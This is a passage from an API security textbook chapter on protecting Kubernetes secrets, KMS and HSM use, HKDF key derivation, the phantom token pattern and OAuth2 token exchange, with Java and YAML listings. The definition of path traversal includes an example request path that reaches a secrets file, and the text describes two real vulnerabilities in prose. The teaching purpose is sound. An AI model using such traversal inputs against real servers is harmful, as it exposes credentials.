File-based secrets should be preferred over environment variables. It’s
easy to read the environment of a running process using kubectl describe
pod, and you can’t use environment variables for binary data such as keys.
File-based secrets are also updated when the secret changes, while environ-
ment variables can only be changed by restarting the pod.
Listing 11.12 shows how to expose the Natter database username and password to the
pods in the Natter API deployment by updating the natter-api-deployment.yaml file. A
secret volume is defined in the volumes section of the pod spec, referencing the
named secret to be exposed. In a volumeMounts section for the individual container,
you can then mount the secret volume on a specific path in the filesystem. The new
lines are highlighted in bold.
Listing 11.12  Exposing a secret to a pod

apiVersion: apps/v1
kind: Deployment
metadata:
  name: natter-api-deployment
  namespace: natter-api
spec:
  selector:
    matchLabels:
      app: natter-api
  replicas: 1
  template:
    metadata:
      labels:
        app: natter-api
    spec:
      securityContext:
        runAsNonRoot: true
      containers:
        - name: natter-api
          image: apisecurityinaction/natter-api:latest
          imagePullPolicy: Never
          volumeMounts:
            # The volumeMount name must match the volume name.
            - name: db-password
              # Specify a mount path inside the container.
              mountPath: "/etc/secrets/database"
              readOnly: true
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop:
                - all
          ports:
            - containerPort: 4567
      volumes:
        - name: db-password
          secret:
            # Provide the name of the secret to expose.
            secretName: db-password
You can now update the Main class to load the database username and password from
these secret files rather than hard coding them. Listing 11.13 shows the updated code
in the main method for initializing the database password from the mounted secret
files. You’ll need to import java.nio.file.* at the top of the file. Open the Main
.java file and update the method according to the listing. The new lines are high-
lighted in bold.
Listing 11.13  Loading Kubernetes secrets

// Load secrets as files from the filesystem.
var secretsPath = Paths.get("/etc/secrets/database");
var dbUsername = Files.readString(secretsPath.resolve("username"));
var dbPassword = Files.readString(secretsPath.resolve("password"));

var jdbcUrl = "jdbc:h2:tcp://natter-database-service:9092/mem:natter";
// Use the secret values to initialize the JDBC connection.
var datasource = JdbcConnectionPool.create(
        jdbcUrl, dbUsername, dbPassword);
createTables(datasource.getConnection());
You can rebuild the Docker image by running:7

mvn clean compile jib:dockerBuild
then reload the deployment configuration to ensure the secret is mounted:
kubectl apply -f kubernetes/natter-api-deployment.yaml
Finally, you can restart Minikube to pick up the latest changes:
minikube stop && minikube start
Use kubectl get pods -n natter-api --watch to verify that all pods start up correctly
after the changes.
7 Remember to run eval $(minikube docker-env) if this is a new terminal session.
SECURITY OF KUBERNETES SECRETS
Although Kubernetes secrets are easy to use and provide a level of separation between
sensitive credentials and other source code and configuration data, they have some
drawbacks from a security perspective:
- Secrets are stored inside an internal database in Kubernetes, known as etcd. By default, etcd is not encrypted, so anyone who gains access to the data storage can read the values of all secrets. You can enable encryption by following the instructions in http://mng.bz/awZz.
WARNING
The official Kubernetes documentation lists aescbc as the stron-
gest encryption method supported. This is an unauthenticated encryption
mode and potentially vulnerable to padding oracle attacks as you’ll recall
from chapter 6. You should use the kms encryption option if you can,
because all modes other than kms store the encryption key alongside the
encrypted data, providing only limited security. This was one of the find-
ings of the Kubernetes security audit conducted in 2019 (https://github
.com/trailofbits/audit-kubernetes).
- Anybody with the ability to create a pod in a namespace can use that to read the contents of any secrets defined in that namespace. System administrators with root access to nodes can retrieve all secrets from the Kubernetes API.
- Secrets on disk may be vulnerable to exposure through path traversal or file exposure vulnerabilities. For example, Ruby on Rails had a recent vulnerability in its template system that allowed a remote attacker to view the contents of any file by sending specially crafted HTTP headers (https://nvd.nist.gov/vuln/detail/CVE-2019-5418).

DEFINITION  A file exposure vulnerability occurs when an attacker can trick a server into revealing the contents of files on disk that should not be accessible externally. A path traversal vulnerability occurs when an attacker can send a URL to a webserver that causes it to serve a file that was intended to be private. For example, an attacker might ask for the file /public/../../../etc/secrets/db-password. Such vulnerabilities can reveal Kubernetes secrets to attackers.

Managing Kubernetes secrets
Although you can treat Kubernetes secrets like other configuration and store them in your version control system, this is not a wise thing to do for several reasons:
- Credentials should be kept secret and distributed to as few people as possible. Storing secrets in a source code repository makes them available to all developers with access to that repository. Although encryption can help, it is easy to get wrong, especially with complex command-line tools such as GPG.
- Secrets should be different in each environment that the service is deployed to; the database password should be different in a development environment compared to your test or production environments. This is the opposite requirement to source code, which should be identical (or close to it) between environments.
- There is almost no value in being able to view the history of secrets. Although you may want to revert the most recent change to a credential if it causes an outage, nobody ever needs to revert to the database password from two years ago. If a mistake is made in the encryption of a secret that is hard to change, such as an API key for a third-party service, it's difficult to completely delete the exposed value from a distributed version control system.
A better solution is to either manually manage secrets from the command line, or else use a templating system to generate secrets specific to each environment. Kubernetes supports a templating system called Kustomize, which can generate per-environment secrets based on templates. This allows the template to be checked into version control, but the actual secrets are added during a separate deployment step. See http://mng.bz/Mov7 for more details.
11.5.2 Key and secret management services
An alternative to Kubernetes secrets is to use a dedicated service to provide credentials to your application. Secrets management services store credentials in an encrypted database and make them available to services over HTTPS or a similar secure protocol. Typically, the client needs an initial credential to access the service, such as an API key or client certificate, which can be made available via Kubernetes secrets or a similar mechanism. All other secrets are then retrieved from the secrets management service. Although this may sound no more secure than using Kubernetes secrets directly, it has several advantages:
- The storage of the secrets is encrypted by default, providing better protection of secret data at rest.
- The secret management service can automatically generate and update secrets regularly. For example, Hashicorp Vault (https://www.vaultproject.io) can automatically create short-lived database users on the fly, providing a temporary username and password. After a configurable period, Vault will delete the account again. This can be useful to allow daily administration tasks to run without leaving a highly privileged account enabled at all times.
- Fine-grained access controls can be applied, ensuring that services only have access to the credentials they need.
- All access to secrets can be logged, leaving an audit trail. This can help to establish what happened after a breach, and automated systems can analyze these logs and alert if unusual access requests are noticed.
When the credentials being accessed are cryptographic keys, a Key Management Service
(KMS) can be used. A KMS, such as those provided by the main cloud providers,
securely stores cryptographic key material. Rather than exposing that key material
directly, a client of a KMS sends cryptographic operations to the KMS; for example,
requesting that a message is signed with a given key. This ensures that sensitive keys
are never directly exposed, and allows a security team to centralize cryptographic ser-
vices, ensuring that all applications use approved algorithms.
DEFINITION
A Key Management Service (KMS) stores keys on behalf of applica-
tions. Clients send requests to perform cryptographic operations to the KMS
rather than asking for the key material itself. This ensures that sensitive keys
never leave the KMS.
To reduce the overhead of calling a KMS to encrypt or decrypt large volumes of data,
a technique known as envelope encryption can be used. The application generates a ran-
dom AES key and uses that to encrypt the data locally. The local AES key is known as a
data encryption key (DEK). The DEK is then itself encrypted using the KMS. The
encrypted DEK can then be safely stored or transmitted alongside the encrypted data.
To decrypt, the recipient first decrypts the DEK using the KMS and then uses the DEK
to decrypt the rest of the data.
DEFINITION
In envelope encryption, an application encrypts data with a local
data encryption key (DEK). The DEK is then encrypted (or wrapped) with a key
encryption key (KEK) stored in a KMS or other secure service. The KEK itself
might be encrypted with another KEK creating a key hierarchy.
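As a rough sketch of envelope encryption in Java (the KmsClient interface here is a hypothetical stand-in for a real KMS SDK, whose wrap/unwrap operations will look different in practice):

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.spec.GCMParameterSpec;
import java.security.SecureRandom;

class EnvelopeExample {
    // Hypothetical KMS interface; real SDKs (AWS KMS, GCP KMS, Vault) differ.
    interface KmsClient {
        byte[] wrap(byte[] dek);       // encrypt the DEK under a KEK held in the KMS
        byte[] unwrap(byte[] wrapped); // decrypt the DEK using the KMS
    }

    static byte[][] encrypt(KmsClient kms, byte[] plaintext) throws Exception {
        // Generate a fresh local data encryption key (DEK).
        var keyGen = KeyGenerator.getInstance("AES");
        keyGen.init(256);
        var dek = keyGen.generateKey();

        // Encrypt the data locally with AES-GCM and a random 96-bit nonce.
        var nonce = new byte[12];
        new SecureRandom().nextBytes(nonce);
        var cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, dek, new GCMParameterSpec(128, nonce));
        var ciphertext = cipher.doFinal(plaintext);

        // Wrap the DEK with the KMS so it can be stored alongside the data.
        var wrappedDek = kms.wrap(dek.getEncoded());
        return new byte[][] { wrappedDek, nonce, ciphertext };
    }
}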
For both secrets management and KMS, the client usually interacts with the service
using a REST API. Currently, there is no common standard API supported by all pro-
viders. Some cloud providers allow access to a KMS using the standard PKCS#11 API
used by hardware security modules. You can access a PKCS#11 API in Java through the
Java Cryptography Architecture, as if it was a local keystore, as shown in listing 11.14.
(This listing is just to show the API; you don’t need to type it in.) Java exposes a
PKCS#11 device, including a remote one such as a KMS, as a KeyStore object with the
type "PKCS11".8 You can load the keystore by calling the load() method, providing a
null InputStream argument (because there is no local keystore file to open) and pass-
ing the KMS password or other credential as the second argument. After the PKCS#11
keystore has been loaded, you can then load keys and use them to initialize Signature
and Cipher objects just like any other local key. The difference is that the Key object
returned by the PKCS#11 keystore has no key material inside it. Instead, Java will auto-
matically forward cryptographic operations to the KMS via the PKCS#11 API.
TIP
Java’s built-in PKCS#11 cryptographic provider only supports a few algo-
rithms, many of which are old and no longer recommended. A KMS vendor
may offer their own provider with support for more algorithms.
Listing 11.14  Accessing a KMS through PKCS#11

var keyStore = KeyStore.getInstance("PKCS11");
var keyStorePassword = "changeit".toCharArray();
// Load the PKCS11 keystore with the correct password.
keyStore.load(null, keyStorePassword);

// Retrieve a key object from the keystore.
var signingKey = (PrivateKey) keyStore.getKey("rsa-key",
        keyStorePassword);

// Use the key to sign a message.
var signature = Signature.getInstance("SHA256WithRSA");
signature.initSign(signingKey);
signature.update("Hello!".getBytes(UTF_8));
var sig = signature.sign();

8 If you're using the IBM JDK, use the name "PKCS11IMPLKS" instead.
A KMS can be used to encrypt credentials that are then distributed to services using
Kubernetes secrets. This provides better protection than the default Kubernetes con-
figuration and enables the KMS to be used to protect secrets that aren’t cryp-
tographic keys. For example, a database connection password can be encrypted with
the KMS and then the encrypted password is distributed to services as a Kubernetes
secret. The application can then use the KMS to decrypt the password after loading it
from the disk.
PKCS#11 and hardware security modules
PKCS#11, or Public Key Cryptography Standard 11, defines a standard API for inter-
acting with hardware security modules (HSMs). An HSM is a hardware device dedi-
cated to secure storage of cryptographic keys. HSMs range in size from tiny USB keys
that support just a few keys, to rack-mounted network HSMs that can handle thou-
sands of requests per second (and cost tens of thousands of dollars). Just like a KMS,
the key material can’t normally be accessed directly by clients and they instead send
cryptographic requests to the device after logging in. The API defined by PKCS#11,
known as Cryptoki, provides operations in the C programming language for logging
into the HSM, listing available keys, and performing cryptographic operations.
Unlike a purely software KMS, an HSM is designed to offer protection against an
attacker with physical access to the device. For example, the circuitry of the HSM may
be encased in tough resin with embedded sensors that can detect anybody trying to
tamper with the device, in which case the secure memory is wiped to prevent com-
promise. The US and Canadian governments certify the physical security of HSMs
under the FIPS 140-2 certification program, which offers four levels of security: level
1 certified devices offer only basic protection of key material, while level 4 offers pro-
tection against a wide range of physical and environmental threats. On the other
hand, FIPS 140-2 offers very little validation of the quality of implementation of the
algorithms running on the device, and some HSMs have been found to have serious
software security flaws. Some cloud KMS providers can be configured to use FIPS
140-2 certified HSMs for storage of keys, usually at an increased cost. However,
most such services are already running in physically secured data centers, so the
additional physical protection is usually unnecessary.
11.5.3 Avoiding long-lived secrets on disk
Although a KMS or secrets manager can be used to protect secrets against theft, the
service will need an initial credential to access the KMS itself. While cloud KMS pro-
viders often supply an SDK that transparently handles this for you, in many cases the
SDK is just reading its credentials from a file on the filesystem or from another source
in the environment that the SDK is running in. There is therefore still a risk that an
attacker could compromise these credentials and then use the KMS to decrypt the
other secrets.
TIP
You can often restrict a KMS to only allow your keys to be used from cli-
ents connecting from a virtual private cloud (VPC) that you control. This
makes it harder for an attacker to use compromised credentials because they
can’t directly connect to the KMS over the internet.
A solution to this problem is to use short-lived tokens to grant access to the KMS or
secrets manager. Rather than deploying a username and password or other static cre-
dential using Kubernetes secrets, you can instead generate a temporary credential
with a short expiry time. The application uses this credential to access the KMS or
secrets manager at startup and decrypt the other secrets it needs to operate. If an
attacker later compromises the initial token, it will have expired and can’t be used.
For example, Hashicorp Vault (https://vaultproject.io) supports generating tokens
with a limited expiry time which a client can then use to retrieve other secrets from
the vault.
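For example, Vault's CLI can mint such a token along these lines (a sketch; the policy name is a placeholder and available flags vary by version):

vault token create -ttl=5m -use-limit=1 -policy=natter-secrets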
Pop quiz
10  Which of the following are ways that a Kubernetes secret can be exposed to pods?
    a  As files
    b  As sockets
    c  As named pipes
    d  As environment variables
    e  As shared memory buffers
11  What is the name of the standard that defines an API for talking to hardware security modules?
    a  PKCS#1
    b  PKCS#7
    c  PKCE
    d  PKCS#11
    e  PKCS#12
The answers are at the end of the chapter.
CAUTION
The techniques in this section are significantly more complex than
other solutions. You should carefully weigh the increased security against
your threat model before adopting these approaches.
If you primarily use OAuth2 for access to other services, you can deploy a short-lived
JWT that the service can use to obtain access tokens using the JWT bearer grant
described in section 11.3. Rather than giving clients direct access to the private key to
create their own JWTs, a separate controller process generates JWTs on their behalf
and distributes these short-lived bearer tokens to the pods that need them. The client
then uses the JWT bearer grant type to exchange the JWT for a longer-lived access
token (and optionally a refresh token too). In this way, the JWT bearer grant type can
be used to enforce a separation of duties that allows the private key to be kept securely
away from pods that service user requests. When combined with certificate-bound
access tokens of section 11.4.6, this pattern can result in significantly increased secu-
rity for OAuth2-based microservices.
The main problem with short-lived credentials is that Kubernetes is designed for
highly dynamic environments in which pods come and go, and new service instances
can be created to respond to increased load. The solution is to have a controller process
register with the Kubernetes API server and watch for new pods being created. The con-
troller process can then create a new temporary credential, such as a fresh signed JWT,
and deploy it to the pod before it starts up. The controller process has access to long-
lived credentials but can be deployed in a separate namespace with strict network poli-
cies to reduce the risk of it being compromised, as shown in figure 11.8.
[Figure 11.8 diagram: in the control plane, the Kubernetes API server informs a controller when a new pod is created; the controller uses its private key to create a short-lived JWT and deploys it to the new pod in the data plane; the pod then exchanges the JWT for an access token using the JWT Bearer grant against the AS.]

Figure 11.8  A controller process running in a separate control plane namespace can register with the Kubernetes API to watch for new pods. When a new pod is created, the controller uses its private key to sign a short-lived JWT, which it then deploys to the new pod. The pod can then exchange the JWT for an access token or other long-lived credentials.
A production-quality implementation of this pattern is available, again for Hashicorp
Vault, as the Boostport Kubernetes-Vault integration project (https://github.com/
Boostport/kubernetes-vault). This controller can inject unique secrets into each pod,
allowing the pod to connect to Vault to retrieve its other secrets. Because the initial
secrets are unique to a pod, they can be restricted to allow only a single use, after
which the token becomes invalid. This ensures that the credential is valid for the
shortest possible time. If an attacker somehow managed to compromise the token
before the pod used it, then the pod will noisily fail to start up when it fails to connect
to Vault, providing a signal to security teams that something unusual has occurred.
11.5.4 Key derivation
A complementary approach to secure distribution of secrets is to reduce the number
of secrets your application needs in the first place. One way to achieve this is to derive
cryptographic keys for different purposes from a single master key, using a key deriva-
tion function (KDF). A KDF takes the master key and a context argument, which is typ-
ically a string, and returns one or more new keys as shown in figure 11.9. A different
context argument results in completely different keys and each key is indistinguish-
able from a completely random key to somebody who doesn’t know the master key,
making them suitable as strong cryptographic keys.

[Figure 11.9 diagram: a KDF takes a master key and a context string (such as "jwt-enc-key") as inputs and produces a derived key; different context strings produce different derived keys.]

Figure 11.9  A key derivation function (KDF) takes a master key and context string as inputs and produces derived keys as outputs. You can derive an almost unlimited number of strong keys from a single high-entropy master key.
If you recall from chapter 9, macaroons work by treating the HMAC tag of an existing
token as a key when adding a new caveat. This works because HMAC is a secure pseudo-
random function, which means that its outputs appear completely random if you don’t
know the key. This is exactly what we need to build a KDF, and in fact HMAC is used as
the basis for a widely used KDF called HKDF (HMAC-based KDF, https://tools.ietf.org/
html/rfc5869). HKDF consists of two related functions:
- HKDF-Extract takes as input a high-entropy input that may not be suitable for direct use as a cryptographic key and returns a HKDF master key. This function
is useful in some cryptographic protocols but can be skipped if you already have
a valid HMAC key. You won’t use HKDF-Extract in this book.
- HKDF-Expand takes the master key and a context and produces an output key of any requested size.
DEFINITION
HKDF is a HMAC-based KDF based on an extract-and-expand
method. The expand function can be used on its own to generate keys from a
master HMAC key.
Listing 11.15 shows an implementation of HKDF-Expand using HMAC-SHA-256. To
generate the required amount of output key material, HKDF-Expand performs a
loop. Each iteration of the loop runs HMAC to produce a block of output key material
with the following inputs:
1. The HMAC tag from the last time through the loop, unless this is the first loop.
2. The context string.
3. A block counter byte, which starts at 1 and is incremented each time.
With HMAC-SHA-256 each iteration of the loop generates 32 bytes of output key
material, so you’ll typically only need one or two loops to generate a big enough key for
most algorithms. Because the block counter is a single byte, and cannot be 0, you can
only loop a maximum of 255 times, which gives a maximum key size of 8,160 bytes.
Finally, the output key material is converted into a Key object using the javax.crypto.spec.SecretKeySpec class. Create a new file named HKDF.java in the src/main/java/com/manning/apisecurityinaction folder with the contents of the listing.
TIP
If the master key lives in a HSM or KMS then it is much more efficient to
combine the inputs into a single byte array rather than making multiple calls
to the update() method.
Listing 11.15  HKDF-Expand

package com.manning.apisecurityinaction;

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.security.*;

import static java.nio.charset.StandardCharsets.UTF_8;
import static java.util.Objects.checkIndex;

public class HKDF {
    public static Key expand(Key masterKey, String context,
            int outputKeySize, String algorithm)
            throws GeneralSecurityException {
        // Ensure the caller didn't ask for too much key material.
        checkIndex(outputKeySize, 255*32);

        // Initialize the Mac with the master key.
        var hmac = Mac.getInstance("HmacSHA256");
        hmac.init(masterKey);

        var output = new byte[outputKeySize];
        var block = new byte[0];
        // Loop until the requested output size has been generated.
        for (int i = 0; i < outputKeySize; i += 32) {
            // Include the output block of the last loop in the new HMAC.
            hmac.update(block);
            // Include the context string and the current block counter.
            hmac.update(context.getBytes(UTF_8));
            hmac.update((byte) ((i / 32) + 1));
            block = hmac.doFinal();
            // Copy the new HMAC tag to the next block of output.
            System.arraycopy(block, 0, output, i,
                    Math.min(outputKeySize - i, 32));
        }
        return new SecretKeySpec(output, algorithm);
    }
}
You can now use this to generate as many keys as you want from an initial HMAC key.
For example, you can open the Main.java file and replace the code that loads the AES
encryption key from the keystore with the following code that derives it from the
HMAC key instead as shown in the bold line here:
var macKey = keystore.getKey("hmac-key", "changeit".toCharArray());
var encKey = HKDF.expand(macKey, "token-encryption-key",
32, "AES");
WARNING
A cryptographic key should be used for a single purpose. If you use
a HMAC key for key derivation, you should not use it to also sign messages.
You can use HKDF to derive a second HMAC key to use for signing.
You can generate almost any kind of symmetric key using this method, making sure
to use a distinct context string for each different key. Key pairs for public key cryp-
tography generally can’t be generated in this way, as the keys are required to have
some mathematical structure that is not present in a derived random key. However,
the Salty Coffee library used in chapter 6 contains methods for generating key pairs
for public key encryption and for digital signatures from a 32-byte seed, which can
be used as follows:
// Use HKDF to generate a seed.
var seed = HKDF.expand(macKey, "nacl-signing-key-seed", 32, "NaCl");
// Derive a signing keypair from the seed.
var keyPair = Crypto.seedSigningKeyPair(seed.getEncoded());
CAUTION
The algorithms used by Salty Coffee, X25519 and Ed25519, are
designed to safely allow this. The same is not true of other algorithms.
Although generating a handful of keys from a master key may not seem like much of a
savings, the real value comes from the ability to generate keys programmatically that
are the same on all servers. For example, you can include the current date in the
context string and automatically derive a fresh encryption key each day without
needing to distribute a new key to every server. If you include the context string in the
encrypted data, for example as the kid header in an encrypted JWT, then you can
quickly re-derive the same key whenever you need without storing previous keys.
11.6 Service API calls in response to user requests
When a service makes an API call to another service in response to a user request, but uses its own credentials rather than the user's, there is an opportunity for confused deputy attacks like those discussed in chapter 9. Because service credentials are often more privileged than normal users, an attacker may be able to trick the service into performing malicious actions on their behalf.
You can avoid confused deputy attacks in service-to-service calls that are carried out in response to user requests by ensuring that access control decisions made in backend services include the context of the original request. The simplest solution is for frontend services to pass along the username or other identifier of the user that made the original request. The backend service can then make an access control decision based on the identity of this user rather than solely on the identity of the calling service. Service-to-service authentication is used to establish that the request comes from a trusted source (the frontend service), and permission to perform the action is determined based on the identity of the user indicated in the request.

TIP  As you'll recall from chapter 9, capability-based security can be used to systematically eliminate confused deputy attacks. If the authority to perform an operation is encapsulated as a capability, this can be passed from the user to all backend services involved in implementing that operation. The authority to perform an operation comes from the capability rather than the identity of the service making a request, so an attacker can't request an operation they don't have a capability for.

Pop quiz
12  Which HKDF function is used to derive keys from a HMAC master key?
    a  HKDF-Extract
    b  HKDF-Expand
    c  HKDF-Extrude
    d  HKDF-Exhume
    e  HKDF-Exfiltrate
The answer is at the end of the chapter.

Facebook CATs
As you might expect, Facebook needs to run many services in production with numerous clients connecting to each service. At the huge scale they are running at, public key cryptography is deemed too expensive, but they still want to use strong authentication between clients and services. Every request and response between a client and a service is authenticated with HMAC using a key that is unique to that client-service pair. These signed HMAC tokens are known as Crypto Auth Tokens, or CATs, and are a bit like signed JWTs.
To avoid storing, distributing, and managing thousands of keys, Facebook uses key derivation heavily. A central key distribution service stores a master key. Clients and services authenticate to the key distribution service to get keys based on their identity. The key for a service with the name "AuthService" is calculated using KDF(masterKey, "AuthService"), while the key for a client named "Test" to talk to the auth service is calculated as KDF(KDF(masterKey, "AuthService"), "Test"). This allows Facebook to quickly generate an almost unlimited number of client and service keys from the single master key. You can read more about Facebook's CATs at https://eprint.iacr.org/2018/413.
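The nested derivation described in the sidebar could be sketched with the HKDF class from listing 11.15 like this (purely illustrative; Facebook's actual KDF and parameters aren't specified here):

// Derive the service key from the master key, then a per-client key from it.
var serviceKey = HKDF.expand(masterKey, "AuthService", 32, "HmacSHA256");
var clientKey = HKDF.expand(serviceKey, "Test", 32, "HmacSHA256");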
11.6.1 The phantom token pattern
Although passing the username of the original user is simple and can avoid confused
deputy attacks, a compromised frontend service can easily impersonate any user by sim-
ply including their username in the request. An alternative would be to pass down the
token originally presented by the user, such as an OAuth2 access token or JWT. This
allows backend services to check that the token is valid, but it still has some drawbacks:
- If the access token requires introspection to check validity, then a network call to the AS has to be performed at each microservice that is involved in processing a request. This can add a lot of overhead and additional delays.
- On the other hand, backend microservices have no way of knowing if a long-lived signed token such as a JWT has been revoked without performing an introspection request.
- A compromised microservice can take the user's token and use it to access other services, effectively impersonating the user. If service calls cross trust boundaries, such as when calls are made to external services, the risk of exposing the user's token increases.

Kubernetes critical API server vulnerability
In 2018, the Kubernetes project itself reported a critical vulnerability allowing this kind of confused deputy attack (https://rancher.com/blog/2018/2018-12-04-k8s-cve/). In the attack, a user made an initial request to the Kubernetes API server, which authenticated the request and applied access control checks. It then made its own connection to a backend service to fulfill the request. This API request to the backend service used highly privileged Kubernetes service account credentials, providing administrator-level access to the entire cluster. The attacker could trick Kubernetes into leaving the connection open, allowing the attacker to send their own commands to the backend service using the service account. The default configuration permitted even unauthenticated users to exploit the vulnerability to execute any commands on backend servers. To make matters worse, Kubernetes audit logging filtered out all activity from system accounts, so there was no trace that an attack had taken place.
The first two points can be addressed through an OAuth2 deployment pattern imple-
mented by some API gateways, shown in figure 11.10. In this pattern, users present
long-lived access tokens to the API gateway which performs a token introspection call
to the AS to ensure the token is valid and hasn’t been revoked. The API gateway then
takes the contents of the introspection response, perhaps augmented with additional
information about the user (such as roles or group memberships) and produces a
short-lived JWT signed with a key trusted by all the microservices behind the gateway.
The gateway then forwards the request to the target microservices, replacing the orig-
inal access token with this short-lived JWT. This is sometimes referred to as the phan-
tom token pattern. If a public key signature is used for the JWT then microservices can
validate the token but not create their own.
DEFINITION
In the phantom token pattern, a long-lived opaque access token is
validated and then replaced with a short-lived signed JWT at an API gateway.
Microservices behind the gateway can examine the JWT without needing to
perform an expensive introspection request.
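As a rough sketch of the gateway side of this pattern, the following code mints a short-lived signed JWT from claims obtained by introspection. It uses the Nimbus JOSE+JWT library; the method name, issuer and audience URIs, and the 30-second lifetime are illustrative assumptions, and the introspection call and key loading are assumed to happen elsewhere.

import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.RSASSASigner;
import com.nimbusds.jwt.*;
import java.security.interfaces.RSAPrivateKey;
import java.util.Date;

// Hypothetical gateway helper: copy the introspected subject and scope
// into a JWT that expires in 30 seconds, signed with the gateway's key.
static String phantomToken(String subject, String scope,
                           RSAPrivateKey gatewayKey) throws JOSEException {
    var claims = new JWTClaimsSet.Builder()
            .subject(subject)
            .issuer("https://gateway.example.com")
            .audience("https://service.example.com")
            .claim("scope", scope)
            .expirationTime(new Date(System.currentTimeMillis() + 30_000))
            .build();
    var jwt = new SignedJWT(new JWSHeader(JWSAlgorithm.RS256), claims);
    jwt.sign(new RSASSASigner(gatewayKey));
    return jwt.serialize();  // forwarded in place of the original access token
}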
Figure 11.10 In the phantom token pattern, an API gateway introspects access tokens arriving from external clients by calling the AS. It then replaces the access token with a short-lived JWT containing the same information, signed with the gateway's own private key. Backend microservices can then examine the JWT without having to call the AS to introspect themselves.
The advantage of the phantom token pattern is that microservices behind the gateway
don’t need to perform token introspection calls themselves. Because the JWT is short-
lived, typically with an expiry time measured in seconds or minutes at most, there is
no need for those microservices to check for revocation. The API gateway can exam-
ine the request and reduce the scope and audience of the JWT, limiting the damage
that would be done if any backend microservice has been compromised. In principle,
if the gateway needs to call five different microservices to satisfy a request, it can create
five separate JWTs with scope and audience appropriate to each request. This ensures
the principle of least privilege is respected and reduces the risk if any one of those ser-
vices is compromised, but is rarely done due to the extra overhead of creating new
JWTs, especially if public key signatures are used.
TIP
A network roundtrip within the same datacenter takes a minimum of
0.5ms plus the processing time required by the AS (which may involve data-
base network requests). Verifying a public key signature varies from about
1/10th of this time (RSA-2048 using OpenSSL) to roughly 10 times as long
(ECDSA P-521 using Java’s SunEC provider). Verifying a signature also gen-
erally requires more CPU power than making a network call, which may
impact costs.
The phantom token pattern is a neat balance of the benefits and costs of opaque
access tokens compared to self-contained token formats like JWTs. Self-contained
tokens are scalable and avoid extra network roundtrips, but are hard to revoke, while
the opposite is true of opaque tokens.
PRINCIPLE
Prefer using opaque access tokens and token introspection when
tokens cross trust boundaries to ensure timely revocation. Use self-contained
short-lived tokens for service calls within a trust boundary, such as between
microservices.
11.6.2 OAuth2 token exchange
The token exchange extension of OAuth2 (https://www.rfc-editor.org/rfc/rfc8693.html)
provides a standard way for an API gateway or other client to exchange an access
token for a JWT or other security token. As well as allowing the client to request a new
token, the AS may also add an act claim to the resulting token that indicates that the
service client is acting on behalf of the user that is identified as the subject of the
token. A backend service can then identify both the service client and the user that
initiated the request originally from a single access token.
DEFINITION
Token exchange should primarily be used for delegation semantics,
in which one party acts on behalf of another but both are clearly identified. It
can also be used for impersonation, in which the backend service is unable to
tell that another party is impersonating the user. You should prefer delega-
tion whenever possible because impersonation leads to misleading audit logs
and loss of accountability.
To request a token exchange, the client makes a HTTP POST request to the AS’s
token endpoint, just as for other authorization grants. The grant_type parameter is
set to urn:ietf:params:oauth:grant-type:token-exchange, and the client passes a
token representing the user’s initial authority as the subject_token parameter, with
a subject_token_type parameter describing the type of token (token exchange allows
a variety of tokens to be used, not just access tokens). The client authenticates to the
token endpoint using its own credentials and can provide several optional parameters
shown in table 11.4. The AS will make an authorization decision based on the sup-
plied information and the identity of the subject and the client and then either return
a new access token or reject the request.
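For illustration, a client might issue such a request with Java's java.net.http client as sketched below. The token endpoint URL, client credentials, and helper name are placeholders; how the client authenticates depends on how it was registered with the AS.

import java.net.URI;
import java.net.URLEncoder;
import java.net.http.*;
import java.util.Base64;
import static java.nio.charset.StandardCharsets.UTF_8;

static String exchangeToken(String subjectToken) throws Exception {
    // Build the form-encoded token exchange request body.
    var form = "grant_type=" + URLEncoder.encode(
                "urn:ietf:params:oauth:grant-type:token-exchange", UTF_8) +
            "&subject_token=" + URLEncoder.encode(subjectToken, UTF_8) +
            "&subject_token_type=" + URLEncoder.encode(
                "urn:ietf:params:oauth:token-type:access_token", UTF_8) +
            "&requested_token_type=" + URLEncoder.encode(
                "urn:ietf:params:oauth:token-type:jwt", UTF_8);
    // The client authenticates with its own credentials (here, HTTP Basic).
    var credentials = Base64.getEncoder()
            .encodeToString("client-id:client-secret".getBytes(UTF_8));
    var request = HttpRequest.newBuilder()
            .uri(URI.create("https://as.example.com/oauth2/token"))
            .header("Content-Type", "application/x-www-form-urlencoded")
            .header("Authorization", "Basic " + credentials)
            .POST(HttpRequest.BodyPublishers.ofString(form))
            .build();
    var response = HttpClient.newHttpClient()
            .send(request, HttpResponse.BodyHandlers.ofString());
    return response.body();  // JSON containing the new access token
}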
TIP
Although token exchange is primarily intended for service clients, the
actor_token parameter can reference another user. For example, you can
use token exchange to allow administrators to access parts of other users’
accounts without giving them the user’s password. While this can be done, it
has obvious privacy implications for your users.
The requested_token_type attribute allows the client to request a specific type of
token in the response. The value urn:ietf:params:oauth:token-type:access_token
indicates that the client wants an access token, in whatever token format the AS pre-
fers, while urn:ietf:params:oauth:token-type:jwt can be used to request a JWT
specifically. There are other values defined in the specification, permitting the client
to ask for other security token types. In this way, OAuth2 token exchange can be seen
as a limited form of security token service.
DEFINITION
A security token service (STS) is a service that can translate security
tokens from one format to another based on security policies. An STS can be
used to bridge security systems that expect different token formats.
Table 11.4 Token exchange optional parameters

Parameter             Description
resource              The URI of the service that the client intends to access on
                      the user's behalf.
audience              The intended audience of the token. This is an alternative
                      to the resource parameter where the identifier of the target
                      service is not a URI.
scope                 The desired scope of the new access token.
requested_token_type  The type of token the client wants to receive.
actor_token           A token that identifies the party that is acting on behalf
                      of the user. If not specified, the identity of the client
                      will be used.
actor_token_type      The type of the actor_token parameter.
When a backend service introspects the exchanged access token, they may see a
nested chain of act claims, as shown in listing 11.15. As with other access tokens, the
sub claim indicates the user on whose behalf the request is being made. Access con-
trol decisions should always be made primarily based on the user indicated in this
claim. Other claims in the token, such as roles or permissions, will be about that user.
The first act claim indicates the calling service that is acting on behalf of the user. An
act claim is itself a JSON claims set that may contain multiple identity attributes about
the calling service, such as the issuer of its identity, which may be needed to uniquely
identify the service. If the token has passed through multiple services, then there may
be further act claims nested inside the first one, indicating the previous services that
also acted as the same user in servicing the same request. If the backend service wants
to take the service account into consideration when making access control decisions,
it should limit this to just the first (outermost) act identity. Any previous act identities
are intended only for ensuring a complete audit record.
NOTE
Nested act claims don’t indicate that service77 is pretending to be ser-
